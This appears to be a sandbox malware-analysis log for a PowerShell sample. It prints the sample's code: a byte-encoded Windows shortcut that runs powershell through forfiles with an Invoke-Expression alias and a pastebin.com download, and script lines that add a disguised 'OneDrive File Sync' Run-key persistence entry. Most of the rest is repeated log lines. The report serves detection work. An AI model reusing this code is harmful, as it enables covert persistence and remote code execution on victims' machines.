(76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
